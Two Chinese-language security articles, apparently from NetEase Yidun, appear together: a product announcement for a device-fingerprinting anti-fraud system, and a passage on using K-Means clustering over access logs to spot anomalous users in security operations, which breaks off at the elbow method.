随着移动互联网的应用不断深入，特别是互联网金融、电商、IoT行业的迅猛崛起，黑产的欺诈技术也快速发展。他们通过模拟器、群控平台、刷号软件、自动化脚本、打码平台、短信接口和代理服务器等一整套技术，实现自动化作业流程，可以在短时间内给企业造成巨大的经济损失，阻碍互联网公司业务的良性发展。因此，能够实现设备识别与追踪的设备指纹，成了保护业务安全必不可少的基础技术。 基于这个背景，网易易盾于今日发布了全新的设备DNA指纹系统，能智能锁定唯一设备的DNA指纹，让欺诈仿冒无处躲匿。 网易易盾发布的设备DNA指纹系统包括四个功能，分别是设备标识、智能追回、风险检测和设备信用体系。 设备标识能关联设备硬件、软件、网络、状态等多维度信息，通过易盾特有的加权DNA算法，生成唯一的设备DNA指纹；智能追回是基于易盾机器学习建模，智能调整权重、升降规则，全方位精准识别设备信息篡改行为，当发现设备信息篡改后，无视设备信息篡改，追出设备唯一的DNA指纹；风险监测，能够主动检测，追踪应用环境的潜在风险和漏洞，全方位、多维度对抗非法用户；而设备信用体系，则是基于网易20多年大数据积累，独创设备信用体系，精准标识设备信息，助力业务风险控制。 易盾设备DNA指纹系统的架构 易盾设备DNA指纹系统的背后是易盾安全能力的聚合。它通过聚集硬件信息、软件信息、环境信息和网络信息，经过机器学习、风险监测、DNA设备指纹算法和设备信用体系，从而生成唯一且不变的设备DNA指纹。 网易易盾移动安全产品经理瞿湘昆表示，易盾的设备DNA指纹系统具有唯一性、数据安全和全平台覆盖等多个优点。这位工作将近十年的资深产品经理介绍到，基于易盾安全实验室的多年积累，能智能锁定唯一的设备DNA指纹，设备指纹生成以后，不会因为应用升级重装、系统更新等操作而发生变化；在传输环节，全程采用易盾自研的高强度加密算法进行加密，防止篡改和劫持；平台支持上实现全覆盖，支持Android、iOS、小程序、H5接入。 易盾的设备DNA指纹系统，目前有两个版本，包括客户端版和服务端版，前者不会和易盾服务器有任何通信，适用于信息敏感类客户；而后者有利于提高各端（包括H5、小程序）设备指纹的唯一性。 应用场景上，除了能用于防欺诈风险外，还能够确保支付交易安全、实现精准营销，以及防身份伪造。 网易易盾是国内领先的内容安全&业务安全服务商，易盾面向数字业务提供全面精准地异常账户&有害行为综合风控服务，保障客户业务合规稳健运营，免受黑灰产组织非法侵害，专注创新发展。 设备指纹是易盾反作弊全链路检测中的重要工具，包含设备DNA指纹系统在内的网易易盾反作弊全链路检测服务，目前已服务包括网易考拉、浙报传媒在内的多家大型客户，并为多个大型线上活动保驾护航，取得了非常不错的效果。

作者介绍：黄龙，网易易盾资深安全工程师，专注于互联网安全，擅长安全攻防对抗和甲方安全建设，拥有CISSP认证，同时也是网易云课堂《Web安全工程师》微专业核心制作人。 一、安全运维工作 概述 在整个安全工作中，安全运维是不可或缺的一环，其目的是保证各项安全工作持续有效地运作。除了对外的沟通和业务对接相关工作，大部分安全运维的日常工作相对固定，如漏洞审核、安全产品运维、日志审计和应急响应等工作。 安全工程师除了需要具备一些基础的安全技能，通常还需要具备发现问题的能力和举一反三的能力，比如在漏洞审核是发现一个反射型XSS漏洞，需要思考这个问题是否是通用的问题，通过哪些途径（搜索引擎、业务日志、扫描器脚本等）能发现和挖掘出同类问题，以达到通过问题发现本质。 这些要求和能力所需要的技术，往往也在不断的发展。 技术发展 随着互联网、物联网、大数据和云计算的快速发展，整个IT行业的技术栈都在快速发展，这里我们来简单看一下安全工程师对日志进行安全分析的技术发展史。 早期的业务量不多，技术栈简单，业务复杂度不高，通常日志的量级还不算太大，往往通过简单的命令（awk/sort/cat/find等）或者简单的shell/python/perl脚本，再加上工程师人肉分析来进行处理。比如入侵排查和响应，分析结果和效率往往特别依赖于安全工程师的日志分析能力、经验和Linux操作的熟练度以及脚本的编写使用。 随着互联网的发展，业务量快速增加和技术栈的高速发展，日志越来越多，需要进行日志分析的平台也快速提升，HDFS和ELK（Elasticsearch + Logstash，Kibana）就应运而生。HDFS作为离线分析，安全工程师可以通过简单的Hive SQL完成一些分析和统计工作；ELK一般作为集中日志分析系统，在搜集、展示和查询方面非常灵活，更加简单易用。所以这个时候的日志分析和问题排查，基本上只依赖于安全工程师的日志分析能力和安全经验，而一些hive sql或者es查询语法，学习成本是非常低的。 随着日志量越来越大，一方面日志量越来越大，日志分析的效率需要提高；另一方面很多安全分析的需求也不简单的是一些特征关键字和统计能完成的，可能有些需要依赖于前面的行为等，这时候安全工程师就需要新的工具来进行支撑。 面临的问题 当下，安全运维工作有两个重要指标：效果和效率。 前面我们提到安全运维工程师需要进行安全分析，随着现在业务的快速发展和技术栈复杂度的提升，工程师每天面对的是海量的数据，很多时候的工作可能都是大海捞针，工程师面对海量的日志数据，如何快速地定位问题，以及如何挖掘出更多的安全风险都是急需解决的问题。 安全工程师在运维安全产品的时候，需要通过自身的能力来提升一些安全产品的效果，如降低WAF的漏报情况，安全运维人员或多或少都做过以下一些工作： 比较简单的做法可能就是不停的搜集各种攻击的Payload，进行攻击测试；除了搜集Payload外，深入一点的做法一般是通过梳理关键字/特征从ES或者HDFS提取疑似攻击日志，进行人工分析；随着大数据平台和威胁情报的发展，再进一步的方式会考虑将已经发现攻击的IP和威胁情报的扫描IP的对应的请求进行梳理，进行二次分析；比较理想的做法是对全量日志进行分析，提取攻击行为日志，根据日志提取特征。 这里我们会发现，随着日志量的越来越大，依赖人肉分析大量数据是不现实的。虽然抽样分析和正则或规则匹配也是一种折中方案，但是会存在一定的遗漏风险。这个时候，我们需要通过一些更优的方案和工具，能够快速高效地从海量数据中发现更多未知的问题，而机器学习很可能就是我们的答案。 二、AI赋能安全运维工作初探 安全与机器学习 目前在安全领域已经有很多方向尝试借助机器学习来解决问题，如恶意软件检测、违规图片识别，垃圾邮件识别，UEBA等。 机器学习在垃圾邮件、风控系统和违禁图片识别方向是效果比较显著的，比如对违禁图片进行打标，通过机器学习进行自动分类： 现阶段，大部分机器学习仅仅是融入到各种安全产品中，而在基础安全领域并没有得到很好的利用。一方面是机器学习本身有一定的成本，在日常运维中使用有一定的门槛；另一方面在基础安全领域的机器学习的效果受制于样本的限制，比如在Webshell的检测中，我们发现现有的Webshell样本是远远不够的，有些时候我们会在实践过程中发现，算法的准确性还不如一些简单的规则。 实际上，并不是所有的场景都适合现阶段的机器学习落地，这里我们先来关注一些适合机器学习的场景，比如大量日志数据的处理和分析。 前面的分析我们已经知道，面对大量日志的分析和处理，我们之前使用的初级工具（shell命令、python脚本等）和中级工具（ES搜索、HiveSQL等）等都已经满足不了我们的需求了，这时候我们就需要使用机器学习这个高级工具了。 三、通过日志分析发现异常用户 背景介绍 日志分析和审计在安全运维工作中经常遇到，这里我们考虑一个很简单的日志审计需求：有一个业务，提供了敏感接口的访问日志，需要安全工程师发现哪些人有问题。 针对这类问题，目前比较常见的分析方式主要是基于统计方式，最常见的就是频次统计，比如每个员工的访问阈值是100次/天，当超过了100次我们就报警。这类的分析统计实现是比较简单的，通过时间窗口来实现。 这里，为了展示方便，我选取了一个访问量小的业务，用其中一个功能的访问日志做说明。 简单分析 日志记录的主要信息是：谁在什么时间在什么地点对谁干了什么事情？ 这里面，每一个维度可以单独分析，同时也可以联合分析，很多时候结果完全依赖于运营人员的经验或者是系统的规则。 通常情况下，我们分析的维度包括： 频率：单个用户在一段时间范围内的行为超过了某个阈值；时域：在特定的时间做这件事情，如在凌晨3点，下载了3份文件；地点：通常情况是IP，这里可以和威胁情报做Join，也可以根据业务做分析，比如是员工通过一台美国的服务器访问了xx系统； 这些条件还可以组合，综合一些规则条件来处理。当然，再复杂一点就是一个简单的日志行为分析系统了。 我们考虑一些场景，如果是一些应急的分析需求，日志量有不小，我们怎么来快速进行分析呢？或者是已经有很多日志数据了，因为数据量太大而没有利用起来，我们是否能挖掘其中的价值呢？ 这里我们尝试使用机器学习的算法来进行一些分析。 具体实例——发现异常用户 很多时候，我们的需求是发现异常用户行为，所以需要有工具帮助我们快速提取异常的用户行为。有过日志分析经验的同学应该会有这样的经验：通常情况下，大部分的用户基本都是正常请求；有部分用户的请求是异常；但是异常的情况之间往往有很大的差异。简单来说就是正常的人都差不多，奇葩的人可能有各种奇葩。那么，我们怎么去提取这些“奇葩”呢？ 最理想的情况就是通过机器学习的算法，直接区分出正常和异常的用户。正如我们前面提到的，异常的情况可能是多种多样，所以这里我们不能简单的进行二分类，而是考虑使用聚类算法，先进行分类，再针对各类的用户进行针对性的分析，这里我们尝试使用K-Means算法。 上图就是通过K-Means算法分簇效果展示，通过图表相信大家比较容易理解。 很多时候一开始分析日志时，我们并不清楚正常访问和异常访问具体的特征和区别，所以这里使用 K-Means算法，K-Means本身是无监督学习算法，所以我们在使用时并不需要花费大量的时间来搜集样本，并进行模型训练（终于不用像识别图片验证码那样整理一大堆的样本文件了）。 另外一个很重要的原因就是K-Means算法非常容易实现，上手也比较容易，简单的来说就是先根据请求的特性进行分类，然后我们去掉正常的请求（通常情况下数量最多的一簇），针对其他簇（异常）进行深入分析。 K-Means算法的思想很简单，对于给定的样本集，按照样本之间的距离大小，将样本集划分为K个簇。让簇内的点尽量紧密的连在一起，而让簇间的距离尽量的大。 有关“簇”和“质心”参考下图: 这里具体的原理我们暂时不做解释，感兴趣的同学可以通过搜索引擎自行了解。 算法实践 为了大家方便了解，我们提取了部分数据做一个简单的分析演示。 这是某个系统，敏感接口的访问日志（IP地址和页面信息已经做了脱敏处理），我们现在简单的从用户的访问频次来进行分析。 我们现在主要目的是区分正常用户和异常用户，这里我们并没有之前的用户数据参考，所以选择非监督学习的K-Means算法。 提取特征 首先是提取特征，为了方便演示，我们这里仅使用单个维度特征（用户每天的访问次数）：我们可以先直接通过折线图看一下各个用户的访问情况：因为这个特征本身是数字特征，所以可以直接作为算法的特征，又是单一维度，也省掉了特征转换的一个过程。 提取完特征，我们借助K-Means算法来进行分类，算法会根据业务情况将数据分为几类，到底分为几类需要用户指定，那到底几类比较合理呢？我们可以通过一些方法帮我们决定。 比较直观和常用的方法时肘部法则（Elbow Method），我们来看一下运行的结果： ...